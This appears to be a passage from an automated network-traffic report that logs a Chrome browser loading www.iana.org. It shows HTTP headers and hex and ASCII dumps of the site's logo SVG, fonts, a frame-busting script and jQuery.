                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:12 UTC7489INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 49 41 4e 41 5f 48 65 61 64 65 72 5f 4c 6f 67 6f 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="IANA_Header_Logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink
                            2024-10-10 08:17:12 UTC4080INData Raw: 39 2d 30 2e 32 31 34 2d 31 2e 31 32 2d 30 2e 34 37 39 2d 31 2e 36 32 34 2d 30 2e 37 39 38 63 2d 30 2e 35 30 34 2d 30 2e 33 31 37 2d 30 2e 39 32 34 2d 30 2e 37 31 38 2d 31 2e 32 36 2d 31 2e 32 30 34 0a 09 09 63 2d 30 2e 33 33 36 2d 30 2e 34 38 34 2d 30 2e 35 30 34 2d 31 2e 31 30 31 2d 30 2e 35 30 34 2d 31 2e 38 34 38 63 30 2d 30 2e 37 34 36 2c 30 2e 31 34 35 2d 31 2e 34 2c 30 2e 34 33 34 2d 31 2e 39 36 63 30 2e 32 38 39 2d 30 2e 35 36 2c 30 2e 36 38 36 2d 31 2e 30 32 36 2c 31 2e 31 39 2d 31 2e 34 0a 09 09 63 30 2e 35 30 34 2d 30 2e 33 37 33 2c 31 2e 30 38 37 2d 30 2e 36 35 32 2c 31 2e 37 35 2d 30 2e 38 34 63 30 2e 36 36 33 2d 30 2e 31 38 37 2c 31 2e 33 36 37 2d 30 2e 32 38 2c 32 2e 31 31 34 2d 30 2e 32 38 63 30 2e 34 36 36 2c 30 2c 31 2e 30 31 37 2c 30 2e
                            Data Ascii: 9-0.214-1.12-0.479-1.624-0.798c-0.504-0.317-0.924-0.718-1.26-1.204c-0.336-0.484-0.504-1.101-0.504-1.848c0-0.746,0.145-1.4,0.434-1.96c0.289-0.56,0.686-1.026,1.19-1.4c0.504-0.373,1.087-0.652,1.75-0.84c0.663-0.187,1.367-0.28,2.114-0.28c0.466,0,1.017,0.
                            2024-10-10 08:17:12 UTC14960INData Raw: 31 33 34 2c 30 2e 30 35 37 63 2d 32 2e 32 30 33 2c 30 2d 33 2e 38 36 39 2d 30 2e 36 30 36 2d 34 2e 39 39 38 2d 31 2e 38 32 63 2d 31 2e 31 33 2d 31 2e 32 31 33 2d 31 2e 36 39 34 2d 33 2e 30 37 2d 31 2e 36 39 34 2d 35 2e 35 37 32 63 30 2d 31 2e 33 34 34 2c 30 2e 31 35 34 2d 32 2e 35 30 36 2c 30 2e 34 36 32 2d 33 2e 34 38 35 0a 09 09 63 30 2e 33 30 38 2d 30 2e 39 38 2c 30 2e 37 32 38 2d 31 2e 37 38 37 2c 31 2e 32 36 2d 32 2e 34 32 32 63 30 2e 35 33 32 2d 30 2e 36 33 35 2c 31 2e 31 36 32 2d 31 2e 31 30 36 2c 31 2e 38 39 2d 31 2e 34 31 34 63 30 2e 37 32 38 2d 30 2e 33 30 39 2c 31 2e 35 32 31 2d 30 2e 34 36 33 2c 32 2e 33 38 2d 30 2e 34 36 33 0a 09 09 63 31 2e 37 39 32 2c 30 2c 33 2e 31 33 36 2c 30 2e 35 31 39 2c 34 2e 30 33 32 2c 31 2e 35 35 35 53 32 30 34 2e
                            Data Ascii: 134,0.057c-2.203,0-3.869-0.606-4.998-1.82c-1.13-1.213-1.694-3.07-1.694-5.572c0-1.344,0.154-2.506,0.462-3.485c0.308-0.98,0.728-1.787,1.26-2.422c0.532-0.635,1.162-1.106,1.89-1.414c0.728-0.309,1.521-0.463,2.38-0.463c1.792,0,3.136,0.519,4.032,1.555S204.
                            2024-10-10 08:17:12 UTC2440INData Raw: 2e 30 31 31 2c 31 2e 35 38 38 2d 31 2e 39 31 39 2c 33 2e 31 30 37 2d 31 2e 39 31 39 2c 35 2e 30 37 34 63 30 2c 30 2d 37 2e 33 37 33 2c 35 2e 32 31 33 2d 31 30 2e 32 36 36 2c 35 2e 32 38 31 0a 09 09 63 2d 33 2e 38 33 35 2c 30 2e 30 39 31 2d 33 2e 36 34 36 2d 32 2e 34 38 36 2d 33 2e 35 34 38 2d 34 2e 32 34 36 63 30 2e 32 38 38 2d 35 2e 31 37 38 2c 35 2e 36 36 2d 31 34 2e 33 39 32 2c 39 2e 30 31 37 2d 31 38 2e 39 34 38 63 32 2e 36 32 34 2d 33 2e 35 36 31 2c 31 32 2e 35 36 39 2d 32 30 2e 33 31 38 2c 32 31 2e 31 30 37 2d 32 30 2e 35 30 32 0a 09 09 63 34 2e 37 39 36 2d 30 2e 31 30 34 2c 34 2e 36 30 35 2c 31 2e 39 36 38 2c 35 2e 34 36 38 2c 33 2e 37 32 38 43 32 33 31 2e 32 39 34 2c 35 33 2e 31 30 33 2c 32 31 32 2e 34 39 2c 38 31 2e 30 36 2c 32 31 31 2e 34 33 35
                            Data Ascii: .011,1.588-1.919,3.107-1.919,5.074c0,0-7.373,5.213-10.266,5.281c-3.835,0.091-3.646-2.486-3.548-4.246c0.288-5.178,5.66-14.392,9.017-18.948c2.624-3.561,12.569-20.318,21.107-20.502c4.796-0.104,4.605,1.968,5.468,3.728C231.294,53.103,212.49,81.06,211.435
                            2024-10-10 08:17:12 UTC3901INData Raw: 2e 32 38 38 2d 35 2e 31 37 38 2c 35 2e 36 36 2d 31 34 2e 33 39 32 2c 39 2e 30 31 37 2d 31 38 2e 39 34 38 63 32 2e 36 32 34 2d 33 2e 35 36 31 2c 31 32 2e 35 36 39 2d 32 30 2e 33 31 38 2c 32 31 2e 31 30 36 2d 32 30 2e 35 30 32 0a 09 09 63 34 2e 37 39 36 2d 30 2e 31 30 34 2c 34 2e 36 30 35 2c 31 2e 39 36 38 2c 35 2e 34 36 38 2c 33 2e 37 32 38 43 32 32 37 2e 30 33 39 2c 34 37 2e 38 30 33 2c 32 30 38 2e 32 33 35 2c 37 35 2e 37 36 2c 32 30 37 2e 31 38 2c 37 37 2e 34 31 36 7a 22 2f 3e 0a 09 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 53 56 47 49 44 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 32 32 2e 38 38 30 39 22 20 79 31 3d 22 33 33 2e 34 33 34 36 22 20 78 32 3d 22 33
                            Data Ascii: .288-5.178,5.66-14.392,9.017-18.948c2.624-3.561,12.569-20.318,21.106-20.502c4.796-0.104,4.605,1.968,5.468,3.728C227.039,47.803,208.235,75.76,207.18,77.416z"/><linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="22.8809" y1="33.4346" x2="3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.449759192.0.33.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:13 UTC347OUTGET /_js/iana.js HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:13 UTC1079INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:15:38 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            Last-Modified: Fri, 24 Sep 2021 20:20:55 GMT
                            Content-Length: 68
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 08:24:09 GMT
                            X-Content-Type-Options: nosniff
                            Age: 1382
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Content-Type: text/javascript
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:13 UTC68INData Raw: 69 66 20 28 74 6f 70 20 21 3d 3d 20 73 65 6c 66 29 20 7b 0a 20 20 20 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 0a 7d 0a
                            Data Ascii: if (top !== self) { top.location.replace(self.location.href);}


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.449762192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:13 UTC595OUTGET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:13 UTC1078INHTTP/1.1 200 OK
                            Date: Wed, 09 Oct 2024 18:26:07 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 157504
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Wed, 09 Oct 2024 18:56:07 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Age: 49866
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:13 UTC12576INData Raw: 77 4f 46 46 00 01 00 00 00 02 67 40 00 0f 00 00 00 04 7d d4 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 34 06 28 1b 47 50 4f 53 00 00 02 90 00 00 50 b2 00 00 a4 b6 87 fd a6 05 47 53 55 42 00 00 53 44 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 58 78 00 00 00 60 00 00 00 60 f8 c9 f3 ec 63 6d 61 70 00 00 58 d8 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 65 4c 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 65 58 00 01 3e f4 00 02 14 b4 c1 1d 2c e7 68 65 61 64 00 01 a4 4c 00 00 00 36 00 00 00 36 f8 be 09 8c 68 68 65 61 00 01 a4 84 00 00 00 21 00 00 00 24 0e af 0c 4f 68 6d 74 78 00 01 a4 a8 00 00 11 0b 00 00 25 be 3d ca 78 99 6b 65 72 6e 00 01 b5 b4 00 00 6d
                            Data Ascii: wOFFg@}GDEFX84(GPOSPGSUBSD1`F#OS/2Xx``cmapXrRngaspeLglyfeX>,headL66hhea!$Ohmtx%=xkernm


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.449763192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:13 UTC592OUTGET /_img/2022/fonts/NotoSans-Bold.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:13 UTC1078INHTTP/1.1 200 OK
                            Date: Wed, 09 Oct 2024 12:26:37 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 156596
                            Age: 71527
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Expires: Wed, 09 Oct 2024 12:56:37 GMT
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Content-Type: font/woff
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:13 UTC5776INData Raw: 77 4f 46 46 00 01 00 00 00 02 63 b4 00 0f 00 00 00 04 83 80 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 44 45 46 00 00 01 58 00 00 01 38 00 00 01 a0 35 0e 28 1b 47 50 4f 53 00 00 02 90 00 00 51 a7 00 00 a6 1e c9 c2 8d 0d 47 53 55 42 00 00 54 38 00 00 05 31 00 00 09 60 46 0c 8f 23 4f 53 2f 32 00 00 59 6c 00 00 00 60 00 00 00 60 f9 f5 f7 27 63 6d 61 70 00 00 59 cc 00 00 0c 72 00 00 0f b0 52 ed 6e c1 67 61 73 70 00 00 66 40 00 00 00 0c 00 00 00 0c 00 08 00 1b 67 6c 79 66 00 00 66 4c 00 01 3a bb 00 02 18 cc ce 7c 94 21 68 65 61 64 00 01 a1 08 00 00 00 36 00 00 00 36 f9 34 09 90 68 68 65 61 00 01 a1 40 00 00 00 21 00 00 00 24 0f 24 0d 37 68 6d 74 78 00 01 a1 64 00 00 10 c8 00 00 25 be a8 55 13 aa 6b 65 72 6e 00 01 b2 2c 00 00 6d
                            Data Ascii: wOFFcGDEFX85(GPOSQGSUBT81`F#OS/2Yl``'cmapYrRngaspf@glyffL:|!head664hhea@!$$7hmtxd%Ukern,m
                            2024-10-10 08:17:13 UTC6800INData Raw: 93 a3 ed 2e 74 e0 14 c7 e9 48 e3 69 b6 46 1d f7 7e 80 4f 99 5c df 63 bc bb 9d e5 4e 24 b6 4b da f7 95 72 8d b6 4a 1d 94 8b b4 ef 60 fd 81 6c a7 8d 25 df 76 ec 24 e5 6d 95 c3 5b 4a a3 49 39 7c 95 63 a6 95 43 89 97 96 73 90 d8 04 3e 7b 81 f5 7b b0 97 71 bc 5b cb 91 94 52 4e 36 72 a6 db 9d b8 4b b8 e1 c9 e5 08 ff c2 9a ff 45 1e 16 b2 df 1f f0 a9 45 5c cd 4f b2 ce b3 4e 4c 28 2b a8 93 92 1a 1f 65 9d 67 69 51 ef a6 a7 63 bc a7 07 51 6e a7 5d 4d 88 0d 91 54 9b b2 52 fa 20 d3 79 52 e2 49 48 4d df 59 8e f3 0d f6 9b a0 ac be e1 c4 0c 9c cb 97 9c d8 9e b1 ee db 52 e2 7b d2 89 e4 a5 44 5f e4 18 ea af ae e5 78 44 77 fe 93 fd fe 0f 67 7a 8c 3c 9c ce 11 0e 74 a2 02 b6 53 c1 f1 c7 24 f5 30 42 f0 31 d2 36 4e b0 e6 18 3e 95 4f ef dc cc 92 0f 72 54 73 c9 ed b5 ac 3f 89 75
                            Data Ascii: .tHiF~O\cN$KrJ`l%v$m[JI9|cCs>{{q[RN6rKEE\ONL(+egiQcQn]MTR yRIHMYR{D_xDwgz<tS$0B16N>OrTs?u


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.449761192.0.33.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:13 UTC349OUTGET /_js/jquery.js HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:13 UTC1082INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:13 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            Last-Modified: Fri, 24 Sep 2021 20:20:55 GMT
                            Content-Length: 89501
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 08:25:18 GMT
                            X-Content-Type-Options: nosniff
                            Age: 1315
                            Content-Type: text/javascript
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:13 UTC5772INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                            2024-10-10 08:17:13 UTC6800INData Raw: 75 46 46 46 46 5c 77 2d 5d 2f 67 2c 69 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 22 5c 30 22 3d 3d 3d 65 3f 22 5c 75 66 66 66 64 22 3a 65 2e 73 6c 69 63 65 28 30 2c 2d 31 29 2b 22 5c 5c 22 2b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2e 6c 65 6e 67 74 68 2d 31 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22
                            Data Ascii: uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"
                            2024-10-10 08:17:13 UTC1360INData Raw: 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 74 29 3f 31 3a 75 3f 50 28 75 2c 65 29 2d 50 28 75 2c 74 29 3a 30 3a 34 26 6e 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 6e 2c 72 3d 30 2c 69 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 6f 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 61 3d 5b 65 5d 2c 73 3d 5b 74 5d 3b 69 66 28 21 69 7c 7c 21 6f 29 72 65 74 75 72 6e 20 65 3d 3d 43 3f 2d 31 3a 74 3d 3d 43 3f 31 3a 69 3f 2d 31 3a 6f 3f 31 3a
                            Data Ascii: eDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p&&y(p,t)?1:u?P(u,e)-P(u,t):0:4&n?-1:1)}:function(e,t){if(e===t)return l=!0,0;var n,r=0,i=e.parentNode,o=t.parentNode,a=[e],s=[t];if(!i||!o)return e==C?-1:t==C?1:i?-1:o?1:
                            2024-10-10 08:17:13 UTC16384INData Raw: 3b 77 68 69 6c 65 28 72 2d 2d 29 65 2e 73 70 6c 69 63 65 28 6e 5b 72 5d 2c 31 29 7d 72 65 74 75 72 6e 20 75 3d 6e 75 6c 6c 2c 65 7d 2c 6f 3d 73 65 2e 67 65 74 54 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 22 22 2c 72 3d 30 2c 69 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 69 29 7b 69 66 28 31 3d 3d 3d 69 7c 7c 39 3d 3d 3d 69 7c 7c 31 31 3d 3d 3d 69 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 72 65 74 75 72 6e 20 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3b 66 6f 72 28 65 3d 65 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 6e 2b 3d 6f 28 65 29 7d 65 6c 73 65 20 69 66 28 33 3d 3d 3d 69 7c 7c 34 3d 3d 3d 69 29 72 65 74 75 72
                            Data Ascii: ;while(r--)e.splice(n[r],1)}return u=null,e},o=se.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=o(e)}else if(3===i||4===i)retur
                            2024-10-10 08:17:13 UTC4016INData Raw: 2c 73 29 2c 6c 28 75 2c 6f 2c 4d 2c 73 29 2c 6c 28 75 2c 6f 2c 52 2c 6f 2e 6e 6f 74 69 66 79 57 69 74 68 29 29 29 3a 28 61 21 3d 3d 52 26 26 28 6e 3d 76 6f 69 64 20 30 2c 72 3d 5b 65 5d 29 2c 28 73 7c 7c 6f 2e 72 65 73 6f 6c 76 65 57 69 74 68 29 28 6e 2c 72 29 29 7d 7d 2c 74 3d 73 3f 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 65 28 29 7d 63 61 74 63 68 28 65 29 7b 53 2e 44 65 66 65 72 72 65 64 2e 65 78 63 65 70 74 69 6f 6e 48 6f 6f 6b 26 26 53 2e 44 65 66 65 72 72 65 64 2e 65 78 63 65 70 74 69 6f 6e 48 6f 6f 6b 28 65 2c 74 2e 73 74 61 63 6b 54 72 61 63 65 29 2c 75 3c 3d 69 2b 31 26 26 28 61 21 3d 3d 4d 26 26 28 6e 3d 76 6f 69 64 20 30 2c 72 3d 5b 65 5d 29 2c 6f 2e 72 65 6a 65 63 74 57 69 74 68 28 6e 2c 72 29 29 7d 7d 3b 69 3f 74 28 29 3a 28 53 2e
                            Data Ascii: ,s),l(u,o,M,s),l(u,o,R,o.notifyWith))):(a!==R&&(n=void 0,r=[e]),(s||o.resolveWith)(n,r))}},t=s?e:function(){try{e()}catch(e){S.Deferred.exceptionHook&&S.Deferred.exceptionHook(e,t.stackTrace),u<=i+1&&(a!==M&&(n=void 0,r=[e]),o.rejectWith(n,r))}};i?t():(S.
                            2024-10-10 08:17:13 UTC5440INData Raw: 6f 76 65 28 65 2c 74 29 7d 7d 29 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 64 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 76 61 72 20 74 2c 72 2c 69 2c 6f 3d 74 68 69 73 5b 30 5d 2c 61 3d 6f 26 26 6f 2e 61 74 74 72 69 62 75 74 65 73 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 69 66 28 74 68 69 73 2e 6c 65 6e 67 74 68 26 26 28 69 3d 51 2e 67 65 74 28 6f 29 2c 31 3d 3d 3d 6f 2e 6e 6f 64 65 54 79 70 65 26 26 21 59 2e 67 65 74 28 6f 2c 22 68 61 73 44 61 74 61 41 74 74 72 73 22 29 29 29 7b 74 3d 61 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 74 2d 2d 29 61 5b 74 5d 26 26 30 3d 3d 3d 28 72 3d 61 5b 74 5d 2e 6e 61 6d 65 29 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 22 29 26 26 28 72 3d 58 28 72 2e 73 6c 69 63 65 28 35 29 29 2c 5a 28 6f 2c 72 2c 69
